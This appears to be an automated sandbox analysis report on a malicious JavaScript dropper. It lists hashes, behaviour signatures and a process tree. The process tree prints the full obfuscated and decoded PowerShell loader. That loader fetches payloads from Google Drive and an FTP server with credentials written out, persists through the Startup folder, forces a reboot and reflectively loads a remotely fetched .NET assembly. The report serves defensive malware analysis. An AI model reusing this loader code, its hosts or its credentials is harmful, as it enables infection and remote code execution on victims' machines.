Analysis
- max time kernel: 122s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 17-10-2024 01:15
Static task: static1
Behavioral task: behavioral1
- Sample: 21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js
- Resource: win7-20240903-en
Behavioral task: behavioral2
- Sample: 21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js
- Resource: win10v2004-20241007-en
General
- Target: 21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js
- Size: 120KB
- MD5: c654511bc71143604fa59947da8225bf
- SHA1: 11cb2a2983a22a64b7a822a9b0c484dc1dd5d1e9
- SHA256: 21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3
- SHA512: a646b7e6b4f16390a61399531ca0b5611602020c98084f8e65ca93e1c335bb1416a7054456217287a33f31d8e54ad8e66125ca7e8ddb87daf7de0f065ae79693
- SSDEEP: 1536:5dgBlOFpdq7MkzYWELraVId79UuxMoMxMUOIVSq41M2twpJS7fZ134Sm:+YFp0wq
Malware Config
- Extracted: https://drive.google.com/uc?export=download&id=
Signatures
-
Drops startup file 2 IoCs
  description                  | ioc                                                                                                                                            | Process
  File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js | powershell.exe
  File created                 | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js | powershell.exe
-
  pid  | Process
  2868 | powershell.exe
  2820 | powershell.exe
  2612 | powershell.exe
-
Drops file in Windows directory 3 IoCs
  description                  | ioc                                 | Process
  File created                 | C:\Windows\wusa.lock                | wusa.exe
  File opened for modification | C:\Windows\Logs\DPX\setupact.log    | wusa.exe
  File opened for modification | C:\Windows\Logs\DPX\setuperr.log    | wusa.exe
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
  pid  | Process
  2868 | powershell.exe
  2820 | powershell.exe
  2812 | powershell.exe
  2612 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
  description              | pid  | Process
  Token: SeDebugPrivilege  | 2868 | powershell.exe
  Token: SeDebugPrivilege  | 2820 | powershell.exe
  Token: SeDebugPrivilege  | 2812 | powershell.exe
  Token: SeDebugPrivilege  | 2612 | powershell.exe
-
Suspicious use of WriteProcessMemory 15 IoCs
  description                         | pid  | Process        | procid_target
  PID 2704 wrote to memory of 2868    | 2704 | wscript.exe    | 31   (3 identical entries)
  PID 2868 wrote to memory of 2820    | 2868 | powershell.exe | 33   (3 identical entries)
  PID 2820 wrote to memory of 2812    | 2820 | powershell.exe | 34   (3 identical entries)
  PID 2812 wrote to memory of 3044    | 2812 | powershell.exe | 35   (3 identical entries)
  PID 2820 wrote to memory of 2612    | 2820 | powershell.exe | 36   (3 identical entries)
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js1⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + 'RAEQAcg' + [char]66 + 'mAFYAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAUQ' + [char]66 + 'EAHIAZg' + [char]66 + 'WACAAKQAgAHsAJA' + [char]66 + 'UAFoAVw' + [char]66 + 'vAHUAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAFQAWg' + [char]66 + 'XAG8AdQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAcQ' + [char]66 + 'WAGcAVw' + [char]66 + 'EACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAcQ' + [char]66 + 'WAGcAVw' + [char]66 + 'EACAAKQAgAHsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsAIAA9ACAAKAAkAGQAaA' + [char]66 + '5AGwAawAgACsAIAAnADEATg' + [char]66 + 'hAHEAZA' + [char]66 + 'OAFgAaQ' + [char]66 + 'HAHYASQ' + [char]66 + 'fAHEAMQ' + [char]66 + 'SAFAAaw' + [char]66 + 'hAHoARg' + [char]66 + '0AE0AeQ' + [char]66 + 'nAG0AYQ' + [char]66 + 'xAFQASg' + [char]66 + 
'YAHUANAAyACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGQAaA' + [char]66 + '5AGwAawAgAD0AIAAoACQAZA' + [char]66 + 'oAHkAbA' + [char]66 + 'rACAAKwAgACcAMQ' + [char]66 + 'nADEAag' + [char]66 + 'tAFgAdQ' + [char]66 + 'zAFgAOQ' + [char]66 + 'tAGMAOQ' + [char]66 + 'WAG0AaA' + [char]66 + 'WAHIASg' + [char]66 + 'KADIAWA' + [char]66 + 'vAGYAWgAzAGEASw' + [char]66 + 'fAGMATA' + [char]66 + 'PAHQAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'kAGgAeQ' + [char]66 + 'sAGsALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAVQ' + [char]66 + 'SAEwASw' + [char]66 + 'CACwAIAAkAFQAWg' + [char]66 + 'XAG8AdQAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApACAAOwAkAG0AYw' + [char]66 + 'ZAEQAZgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + '0AGsAcA' + [char]66 + 'sAEIAIAA9ACAAKAAgACQAVA' + [char]66 + 'aAFcAbw' + [char]66 + '1ACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '0AGsAcA' 
+ [char]66 + 'sAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAbQ' + [char]66 + 'jAFkARA' + [char]66 + 'mACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ADsAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' 
+ [char]66 + '0AC4AUw' + [char]66 + 'lAHIAdg' + [char]66 + 'pAGMAZQ' + [char]66 + 'QAG8AaQ' + [char]66 + 'uAHQATQ' + [char]66 + 'hAG4AYQ' + [char]66 + 'nAGUAcg' + [char]66 + 'dADoAOg' + [char]66 + 'TAGUAYw' + [char]66 + '1AHIAaQ' + [char]66 + '0AHkAUA' + [char]66 + 'yAG8AdA' + [char]66 + 'vAGMAbw' + [char]66 + 'sACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'OAGUAdAAuAFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAVA' + [char]66 + '5AHAAZQ' + [char]66 + 'dADoAOg' + [char]66 + 'UAGwAcwAxADIAOwAkAHIAZg' + [char]66 + '4AHMAdgAgAD0AIAAoAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACkAOwAkAHIAZg' + [char]66 + '4AHMAdgAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZwAgAD0AIA' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4AVA' + [char]66 + 'lAHgAdAAuAEUAbg' + [char]66 + 'jAG8AZA' + [char]66 + 'pAG4AZw' + [char]66 + 'dADoAOg' + [char]66 + 'VAFQARgA4ADsAJA' + [char]66 + 'yAGYAeA' + [char]66 + 'zAHYALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAsACcAZA' + [char]66 + 'lAHYAZQ' + [char]66 + 'sAG8AcA' + [char]66 + 'lAHIAcA' + [char]66 + 'yAG8AMgAxADUANwA4AEoAcA' + [char]66 + 'AAEAAJwApADsAJA' + [char]66 + 'jAGsAUQ' + [char]66 + 'QAFcAIAA9ACAAJA' + [char]66 + 'yAGYAeA' + [char]66 + 'zAHYALg' + [char]66 + 
'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQAUw' + [char]66 + '0AHIAaQ' + [char]66 + 'uAGcAKAAgACcAZg' + [char]66 + '0AHAAOgAvAC8AZA' + [char]66 + 'lAHMAYw' + [char]66 + 'rAHYAYg' + [char]66 + 'yAGEAdAAxAEAAZg' + [char]66 + '0AHAALg' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0AC4AYw' + [char]66 + 'vAG0ALg' + [char]66 + 'iAHIALw' + [char]66 + 'VAHAAYw' + [char]66 + 'yAHkAcA' + [char]66 + '0AGUAcgAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'yAGYAeA' + [char]66 + 'zAHYALg' + [char]66 + 'kAGkAcw' + [char]66 + 'wAG8Acw' + [char]66 + 'lACgAKQA7ACQAcg' + [char]66 + 'mAHgAcw' + [char]66 + '2ACAAPQAgACgATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAKQA7ACQAcg' + [char]66 + 'mAHgAcw' + [char]66 + '2AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nACAAPQAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'UAGUAeA' + [char]66 + '0AC4ARQ' + [char]66 + 'uAGMAbw' + [char]66 + 'kAGkAbg' + [char]66 + 'nAF0AOgA6AFUAVA' + [char]66 + 'GADgAOwAkAGMAaw' + [char]66 + 'RAFAAVwAgAD0AIAAkAHIAZg' + [char]66 + '4AHMAdgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'jAGsAUQ' + [char]66 + 'QAFcAIAApADsAWw' + [char]66 + 'CAHkAdA' + [char]66 + 'lAFsAXQ' + [char]66 + 'dACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEMAbw' + [char]66 + 'uAHYAZQ' + [char]66 + 'yAHQAXQA6ADoARg' + [char]66 + 'yAG8AbQ' + [char]66 + 'CAGEAcw' + [char]66 + 'lADYANA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'jAGsAUQ' + [char]66 + 'QAFcALg' + [char]66 + 'SAGUAcA' + [char]66 + 'sAGEAYw' + [char]66 + 'lACgAIAAnAJMhOgCTIScAIAAsACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAApACAAKQA7AFsAUw' + [char]66 + '5AHMAdA' + 
[char]66 + 'lAG0ALg' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAG8AbQ' + [char]66 + 'hAGkAbg' + [char]66 + 'dADoAOg' + [char]66 + 'DAHUAcg' + [char]66 + 'yAGUAbg' + [char]66 + '0AEQAbw' + [char]66 + 'tAGEAaQ' + [char]66 + 'uAC4ATA' + [char]66 + 'vAGEAZAAoACAAJA' + [char]66 + 'kAEMAaQ' + [char]66 + 'XAHoAIAApAC4ARw' + [char]66 + 'lAHQAVA' + [char]66 + '5AHAAZQAoACAAJw' + [char]66 + 'DAGwAYQ' + [char]66 + 'zAHMATA' + [char]66 + 'pAGIAcg' + [char]66 + 'hAHIAeQAzAC4AQw' + [char]66 + 'sAGEAcw' + [char]66 + 'zADEAJwAgACkALg' + [char]66 + 'HAGUAdA' + [char]66 + 'NAGUAdA' + [char]66 + 'oAG8AZAAoACAAJw' + [char]66 + 'wAHIARg' + [char]66 + 'WAEkAJwAgACkALg' + [char]66 + 'JAG4Adg' + [char]66 + 'vAGsAZQAoACQAbg' + [char]66 + '1AGwAbAAsACAAWw' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdA' + [char]66 + 'bAF0AXQAgACgAIAAnAHQAeA' + [char]66 + '0AC4Acw' + [char]66 + '2AHIAZQ' + [char]66 + 'zAC8AeA' + [char]66 + 'pAGYALw' + [char]66 + 'zAG4AaQ' + [char]66 + 'nAHUAbA' + [char]66 + 'wAC8AdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AYwAtAHAAdwAvAGwAYwAuAHMAbw' + [char]66 + 'uAGkAYw' + [char]66 + 'uAGUAcw' + [char]66 + 'vAGwAZQ' + [char]66 + '1AHEAcg' + [char]66 + 'hAHAALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAAsACAAJwAlAEQAQw' + [char]66 + 'QAEoAVQAlACcALAAgACcAdA' + [char]66 + 'yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js') ;powershell $jPhaA2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$QDrfV = $host.Version.Major.Equals(2);If ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ($TZWou + '\Upwin.msu');$dhylk = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $qVgWD ) {$dhylk = ($dhylk + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$dhylk = ($dhylk + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$dhylk = ( New-Object Net.WebClient ) ;$dhylk.Encoding = [System.Text.Encoding]::UTF8 ;$dhylk.DownloadFile($URLKB, $TZWou + '\Upwin.msu') ;$mcYDf = ( 'C:\Users\' + [Environment]::UserName );tkplB = ( $TZWou + '\Upwin.msu' ) ; powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$rfxsv = (New-Object Net.WebClient);$rfxsv.Encoding = [System.Text.Encoding]::UTF8;$rfxsv.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$ckQPW = $rfxsv.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$rfxsv.dispose();$rfxsv = (New-Object Net.WebClient);$rfxsv.Encoding = [System.Text.Encoding]::UTF8;$ckQPW = $rfxsv.DownloadString( $ckQPW );[Byte[]] $dCiWz = [System.Convert]::FromBase64String( $ckQPW.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $dCiWz ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( 'txt.svres/xif/snigulp/tnetnoc-pw/lc.sonicnesoleuqrap//:sptth' , 
'C:\Users\Admin\AppData\Local\Temp\21df648fd084fe89b86984addfb3075d9eec1d3927252c38ea1c9049554dc0d3.js', 'true1' ) );};"3⤵
- Drops startup file
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\wusa.exe"C:\Windows\system32\wusa.exe" tkplB /quiet /norestart5⤵
- Drops file in Windows directory
PID:3044
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2612
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QFFBXDS01EIF26T62ISN.temp
  Filesize: 7KB
  MD5: feb2ce82483b9b46a4b083e5d073f338
  SHA1: 5f8c25793a1bff0371f928bcfab13b2cf408ae6c
  SHA256: 2ec1372d0577f668bf33900d21c4cfa44c76edad6480828881d93b4c1f5f2467
  SHA512: 9289d70042fb998a1c57e45998c0d790a31fe9885a743c400d1b8bbc28570483c1fdb769d845dc8ca71d5d3c02b9caddc13cab0f1fdc2d710a05965cd45ee6b9